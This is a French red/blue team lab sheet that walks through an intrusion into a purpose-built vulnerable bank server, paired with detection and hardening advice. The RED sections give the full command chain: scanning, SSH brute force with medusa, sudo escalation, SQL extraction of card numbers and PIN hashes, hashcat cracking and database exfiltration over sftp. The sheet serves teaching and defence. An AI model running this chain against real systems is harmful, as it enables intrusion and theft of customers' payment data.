# Fiche TP - Kali 01 - intrusion système

### <span style="text-decoration: underline;">**<span style="color: rgb(52,73,94); text-decoration: underline;">I. Introduction</span>**</span>

<p class="callout danger">**Disclaimer** : Merci de lire les notes suivantes avant d'aller plus loin dans ces TP.</p>

- Il est essentiel d'avoir pris connaissance et signé le contrat remis par le moniteur chargé des cours en cybersécurité.
- Ces TP ont pour vocations à être utilisés dans les environnement de tests prévus à cet effet.
- Pour rappel, toute utilisation des compétences évoqués plus bas à des fins malveillantes sont sévèrement punies par la loi.

#### <span style="color: rgb(35,111,161);">***1.1 Contexte***</span>

<table id="bkmrk-%C2%A0-%C2%A0-%C2%A0-la-soci%C3%A9t%C3%A9-ban" style="border-collapse: collapse; width: 100%; height: 192.391px;"><colgroup><col style="width: 27.0238%;"></col><col style="width: 72.9762%;"></col></colgroup><tbody><tr style="height: 192.391px;"><td style="border-style: none; height: 192.391px;">[![logo.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/logo-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/logo-png.png)

</td><td style="border-style: none; height: 192.391px;">La société bancaire VulnBank à vu les données de ses clients exposées à la suite d'une fuite de donnée.

Elle vous a missionné pour reproduire l'attaque afin d'en comprendre le déroulé et d'en tirer une série de correction amenant à ce qu'elle ne se reproduise pas.

</td></tr></tbody></table>

#### ***<span style="color: rgb(35,111,161);">1.2 Objectifs</span>***

<table id="bkmrk-d%C3%A9roul%C3%A9-d%27une-attaqu" style="border-collapse: collapse; width: 100%;"><colgroup><col style="width: 50%;"></col><col style="width: 50%;"></col></colgroup><tbody><tr><td class="align-center" style="border-style: hidden;">Déroulé d'une attaque :</td><td class="align-center" style="border-style: hidden;">Processus de défense ( PICERL )</td></tr><tr><td class="align-center" style="border-style: hidden;"><div drawio-diagram="346"><img src="https://docs.labs404.fr/uploads/images/drawio/2026-07/drawing-1-1772114945-png.png" alt="drawing-1-1772114945.png"/></div>

</td><td class="align-center" style="border-style: hidden;"><div drawio-diagram="347"><img src="https://docs.labs404.fr/uploads/images/drawio/2026-07/drawing-1-1772115528-png.png" alt="drawing-1-1772115528.png"/></div>

</td></tr></tbody></table>

L'objectif de la team <span style="color: rgb(186,55,42);">***RED***</span> va être ici de dérouler le processus de l'attaque sur un serveur linux contenant un accès SSH remote, un site en http et une base de donnée. Le but final est d'organiser une fuite de donnée.

L'objectif de la team <span style="color: rgb(35,111,161);">***BLUE***</span> est habituellement de défendre son serveur, en anticipant les vecteurs d'attaques, en analysant le déroulé de l'attaque de la <span style="color: rgb(186,55,42);">***RED*** </span>team et en essayant de trouver à posteriori des mesures pour contrer ce type d'attaque.

---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**II. Préparation du TP**</span>

<table id="bkmrk-red-blue-installer-u" style="border-collapse: collapse; width: 100%; height: 59.5938px;"><colgroup><col style="width: 50%;"></col><col style="width: 50%;"></col></colgroup><tbody><tr style="height: 29.7969px;"><td class="align-center" style="height: 29.7969px;"><span style="color: rgb(186,55,42);">***RED***</span></td><td class="align-center" style="height: 29.7969px;"><span style="color: rgb(35,111,161);">***BLUE***</span></td></tr><tr style="height: 29.7969px;"><td style="height: 29.7969px;">- Installer une machine Kali standard

</td><td style="height: 29.7969px;">- Installer un serveur Debian et le préparer avec le script fourni.

</td></tr></tbody></table>

---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**III. Phase 1 : Reconnaissance**</span>

<details id="bkmrk-pour-la-red-team-l%27%C3%A9"><summary>Pour la RED team</summary>

<span style="text-decoration: underline;">**Objectif**</span><span style="text-decoration: underline;"> :</span> Identifier les surfaces d'attaques

L'équipe <span style="color: rgb(186,55,42);">***RED***</span> va tout d'abord scanner le réseau afin de déterminer quelles sont les machines de l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span>.

Pour cela, il faudra utiliser l'outil nmap :

```bash
nmap -sn <cidrDuRéseau>
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/auiimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/auiimage-png.png)

Pourra s'ensuivre une phase de découverte des ports ouverts sur cette machine afin de déterminer les angles d'attaques possibles.

```
nmap -sV -A <ipdelacible>
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/kNeimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/kNeimage-png.png)

Ici, deux vecteurs immédiats possibles :

- le SSH : 22
- le HTTP : 80

Il est possible de compléter l’analyse avec un scan web. Récupérer le fichier dictionnaire dans le fichier joint.

```
gobuster dir -u http://<ipduserveur>/ -w ./weblist.txt
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/aUmimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/aUmimage-png.png)

Énumérer également les fichiers dans les répertoires intéressants comme db par exemple

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Y7eimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Y7eimage-png.png)

<span style="text-decoration: underline;">**Livrables attendus** :</span>

- Carte des services explosés
- Cartographie du site web
- Vulnérabilités potentielles

</details><details id="bkmrk-pour-la-blue-team-%C2%A0"><summary>Pour la BLUE team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Détecter la reconnaissance

De son côté, l'équipe <span style="color: rgb(35,111,161);">***BLUE*** </span>va analyser le trafic avec wireshark. Vérifier si elle vois les traces des scans de ports.

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/f0Yimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/f0Yimage-png.png)

Logs du serveur apache sur le scan :

```
tail -f /var/log/apache2/access.log
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/aSPimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/aSPimage-png.png)

Puis lors du scan web, examiner le fichier de log apache :

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/5G2image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/5G2image-png.png)

L'idée pour l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span> est d'arriver sur les pistes de réflexions suivantes :

- Comment contrer la reconnaissance réseau ?
- Comment contrer les scans de ports ?

*Mise en place d'un pare-feu en amont, mise en place du masquerading pour rendre plus difficile la récolte d'information.*

*Changer les ports d'écoute par défaut de tous les services pouvant l'être.*

*Mise en place d'un IDS/IPS pour repérer et bloquer les tentatives de scan.*

*Mise en place d'un centralisateur de logs et d'un SIEM ( **S**ecurity **I**nformation and **E**vent **M**anagement ).*

<span style="text-decoration: underline;">**Livrables attendus:**</span>

- Tableau des événements suspects
- Hypothèses d'intention de l'attaquant

</details>---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**IV. Phase 2 : Préparation**</span>

<details id="bkmrk-pour-la-red-team-l%27%C3%A9-1"><summary>Pour la RED team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Préparer les outils nécessaire à l'attaque

L'équipe <span style="color: rgb(186,55,42);">***RED***</span> va ensuite préparer son attaque par dictionnaire, pour cela il va falloir en créer un ou en copier des existants.

Récupérer les dictionnaires fournis en pièces jointes pour l'accès initial.

<table style="border-collapse: collapse; width: 100%;"><colgroup><col style="width: 50%;"></col><col style="width: 50%;"></col></colgroup><tbody><tr><td class="align-center" style="border-style: none;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/G8gimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/G8gimage-png.png)

</td><td class="align-center" style="border-style: none;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/TFMimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/TFMimage-png.png)

</td></tr></tbody></table>

Le but étant ultimement d'exploiter des codes de cartes bleues à 4 chiffres, il sera nécessaires également de préparer un dictionnaire contenant tous les codes possibles.

Pour le générer, utiliser crunch :

```
crunch 4 4 0123456789 -o pin.txt
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/EEEimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/EEEimage-png.png)

<p class="callout info">**Info** : Si une partie du mot de passe est connue, (par exemple och\*\*\*\*\*), ajouter -t och@@@ pour générer un dictionnaire plus précis et réduire les possibilités.</p>

</details><details id="bkmrk-pour-la-blue-team-de"><summary>Pour la BLUE team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Identifier les faiblesses structurelles

De son côté, l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span> va réfléchir à comment sécuriser ses accès.

L'idée pour l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span> est d'arriver sur les pistes de réflexions suivantes :

- Comment choisir et protéger ses mots de passes ?
- Quels éléments vérifier lors de la mise en oeuvre du service ?

*Utiliser des mots de passes complexes, hors dictionnaire, les changer régulièrement, utiliser des canaux sécurisés pour leur transmission.*

*Utiliser un Générateur de mots de passe et un vault.*

*Vérifier les permissions, les comptes de services, analyses des mots de passe faibles.*

*Analyse des fichiers de configurations (*<span style="color: rgb(132,63,161);">**/etc/ssh/sshd\_config**</span>*)*

</details>---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**V. Phase 3 : Intrusion**</span>

<details id="bkmrk-pour-la-red-team-l%27%C3%A9-2"><summary>Pour la RED team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Obtenir un accès initial

L'équipe <span style="color: rgb(186,55,42);">***RED***</span> va lancer son attaque sur le service SSH de la machine à l'aide des dictionnaires fournis.

```
medusa -U logins.txt -P passwords.txt -h <ipduhost> -M ssh
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/64eimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/64eimage-png.png)

Une fois le compte et le mot de passe identifié, il suffira d'ouvrir une session SSH avec :

```
ssh admin@<ipduserver>
```

Accepter la clé et entrer le mot de passe trouvé.

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/I20image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/I20image-png.png)

Puis identifier les services qui se trouvent sur la machine :

```
service --status-all
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/H9Nimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/H9Nimage-png.png)

<span style="text-decoration: underline;">**Livrables attendus :**</span>

- Preuves d'accès (captures d'écran du shell).
- Commandes utilisées, dictionnaires utilisés.

</details><details id="bkmrk-pour-la-blue-team-de-1"><summary>Pour la BLUE team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Identifier l'intrusion

De son côté, l'équipe <span style="color: rgb(35,111,161);">***BLUE*** </span>va analyser les tentatives de connexions :

```
tail -f /var/log/auth.log | grep -E 'Failed|Accepted'
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/vu4image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/vu4image-png.png)

L'idée pour l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span> est d'arriver sur les pistes de réflexions suivantes :

- Comment protéger son acces SSH contre la bruteforce ?

*Utiliser des mots de passes complexes, hors dictionnaire, les changer régulièrement, utiliser des canaux sécurisés pour leur transmission.*

*Mettre en places des mécanismes permettant de limiter le nombre de tentatives, mettre en place du blocage et du bannissement d'IP, interdire la connexion directe de comptes à privilèges.*

*Ultimement, utiliser une authentification par clé et non par mot de passe.*

*Mettre en place les logs et les audits de connexions pour pouvoir réagir rapidement en cas d'attaque.*

<span style="text-decoration: underline;">**Livrables attendus :**</span>

- Chronologie de l'intrusion
- Preuves logiques (extraits de logs)

</details>---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**VI. Phase 4 : Mouvement latéral**</span>

Le serveur est ici accessible en local et héberge lui-même tous les rôles. Pas de mouvement latéral requis.

Cependant, l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span> peut néanmoins fournir une analyse quand à comment limiter les mouvement latéraux.

*Segmentation réseau : Mise en place de VLAN, routeurs et de pare-feu intermédiaire.*

*Comptes à privilèges minimaux*

*Durcissement SSH.*

---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**VII. Phase 5 : Escalade de privilèges**</span>

<details id="bkmrk-pour-la-red-team-l%27%C3%A9-3"><summary>Pour la RED team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Devenir root.

L'équipe <span style="color: rgb(186,55,42);">***RED***</span> va chercher un moyen d'élever ses privilèges.

Cela commence par identifier les comptes à privilèges :

```
cat /etc/group | grep sudo
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/zPgimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/zPgimage-png.png)

Ici, deux comptes repérés : ste4d- et admin.

Le compte connecté est donc lui-même dans les sudoers.

Si l'on fait :

```
sudo -s
```

l'on peut basculer en super admin.

<p class="callout info">**Info** : Il aurait également été possible pour cette étape, d'injecter un exploit ou d'utiliser un compte de service mal paramétré par exemple.</p>

<span style="text-decoration: underline;">**Livrables attendus :**</span>

- Preuve de l'escalade
- Méthode utilisée (détaillée).

</details><details id="bkmrk-pour-la-blue-team-de-2"><summary>Pour la BLUE team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Comprendre comment l'élévation à été possible.

De son côté, l'équipe <span style="color: rgb(35,111,161);">***BLUE*** </span>va :

Analyser les permissions

Vérifier les SUID

Vérifier les journaux sudo.

```
tail -f /var/log/auth.log | grep sudo
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/NmIimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/NmIimage-png.png)

L'idée pour l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span> est d'arriver sur les pistes de réflexions suivantes :

- Comment repérer une intrusion réussie ?
- Comment éviter une escalade de privilège ?

*Utiliser des mots de passes complexes, hors dictionnaire, les changer régulièrement, utiliser des canaux sécurisés pour leur transmission.*

*Mettre en place des mesures pour journaliser les connexions.*

*Séparer les comptes à privilèges des comptes d'utilisations courants.*

<p class="callout info">**Info** : ici, l'utilisation n'a pas nécessité la mise en place d'un exploit, mais cela peut être le cas. Le seul moyen de s'en prémunir efficacement reste l'installations d'EDR sur les machines.  
</p>

<span style="text-decoration: underline;">**Livrables attendus :**</span>

- Chronologie de l'intrusion
- Preuves logiques (extraits de logs)

</details>---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**VIII. Phase 6 : Persistance**</span>

La phase de persistance ne sera pas développée dans ce TP, mais dans les suivants.

Néanmoins, plusieurs méthodes :

- Ajout d'une clé SSH
- Ajout d'un utilisateur caché
- Ajout d'un CRON malveillant + exploit

---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**IX. Phase 7 : Actions sur objectifs**</span>

<details id="bkmrk-pour-la-red-team-l%27%C3%A9-4"><summary>Pour la RED team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Exfiltrer les données.

L'équipe <span style="color: rgb(186,55,42);">***RED***</span> va chercher un moyen d'accéder à la donnée.

Il va donc falloir gagner un accès à la base. Cela peut se faire via des exploit webs, mais la solution ici sera plus simple.

En effet, le site à besoin de se connecter aux bases de données afin de procéder à l'authentification et à l'affichage du tableau de bord.

De plus, l'audit du site web a mise en évidence ce fichier.

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/fJFimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/fJFimage-png.png)

Il y a effectivement un fichier <span style="color: rgb(132,63,161);">***config.php***</span> dans <span style="color: rgb(132,63,161);">***/var/www/vulnbank/db***</span>.

Essayons de l'afficher.

```
cat /var/www/vulnbank/db/config.php
```

Celui-ci à en effet été mal protégé.

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/8WKimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/8WKimage-png.png)

Tentons une connexion à la base de donnée.

```
mysql -u vulnbank -p
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/4Wwimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/4Wwimage-png.png)

Il faut maintenant en comprendre la structure et essayer de retrouver les données qui nous intéressent. Cela se fera par des bases des Requêtes SQL.

```
SHOW TABLES FROM bank;
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/mbZimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/mbZimage-png.png)

Pour avoir toutes les informations, il va falloir croiser les informations présentes dans les tables.

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wmfimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wmfimage-png.png)

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wo9image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wo9image-png.png)

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/g7Aimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/g7Aimage-png.png)

Maintenant que nous savons comment sont structurées les données, il faut lancer une requête qui va les agréger.

```
SELECT cu.first_name, cu.last_name, ca.number, ci.expirationdate, ci.cryptograme, ci.pin
FROM bank.customers cu
LEFT JOIN bank.cards ca
ON ca.customer_id = cu.id
LEFT JOIN bank.cardsinfo ci
ON ci.card_id = ca.id;
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/IeUimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/IeUimage-png.png)

Il ne reste plus qu'a déchiffrer les codes PIN. Ceux-ci sont visiblement hashés.

Pour plus de facilité, les réunir dans un fichier texte.

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/EGfimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/EGfimage-png.png)

Il faut donc déjà identifier le type de hash :

```
hash-identifier 101951fe7ebe7bd8c77d14f75746b4bc
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Cceimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Cceimage-png.png)

Le plus probable est du 'MD5', il est maintenant possible de cracker les hashs :

```
hashcat -m 0 hashs.txt pin.txt
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/WnCimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/WnCimage-png.png)

A la fin du process, les hashs qui ont été déchiffrés s'affichent.

Il est également possible de les ré afficher avec :

```
hashcat -m 0 hashs.txt pin.txt --show
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/4S3image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/4S3image-png.png)

<p class="callout info">**Info** : Plutôt que de traiter les informations sur place, il est plus intéressant de les exfiltrer pour les travailler de son côté.</p>

Faire un dump de la base :

```
mysqldump -u vulnbank -p bank > mondump.sql
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/U6Eimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/U6Eimage-png.png)

Malgré le message d'erreur, le fichier à bien été dumpé.

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/9CKimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/9CKimage-png.png)

Il faut le récupérer, par exemple avec une connexion sftp.

```
sftp admin@<ipserveur>
get <chemin/vers/fichier/distant> <chemin/vers/fichier/local>
exit
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/fRKimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/fRKimage-png.png)

<span style="text-decoration: underline;">**Livrables attendus :**</span>

- Preuves de l'exfiltration
- Méthode utilisée

</details><details id="bkmrk-pour-la-blue-team-de-3"><summary>Pour la BLUE team</summary>

<span style="text-decoration: underline;">**Objectif :**</span> Détecter la fuite.

De son côté, il est temps pour l'équipe <span style="color: rgb(35,111,161);">***BLUE*** </span>de tirer les leçons de l'incident.

Analyser les différents logs applicatifs et reconstruire le déroulé de la fuite.

L'idée pour l'équipe <span style="color: rgb(35,111,161);">***BLUE***</span> est d'arriver sur les pistes de réflexions suivantes :

- Comment les attaquants ont-ils procédé ?
- Quel a été l'impact ?
- Comment sécuriser l'accès a ses données ?
- (Si déjà abordé) Faire une analyse EBIOS.

<span style="text-decoration: underline;">**Livrables attendus :**</span>

- Rapport d'incident.
- Mesures correctives.

</details>---

### <span style="text-decoration: underline; color: rgb(52,73,94);">**Conclusion**</span>

A la fin de cet exercice, les deux équipes ont pu mieux cerner les implications en terme de sécurité de la bonne configuration ou non des services sur ces systèmes d'informations.

Les failles exploitées ici sont avant tout des failles d'origine humaines.

- Utilisations de mots de passes faibles.
- Mauvaises configuration des permissions.
- Non respect des bonnes pratiques.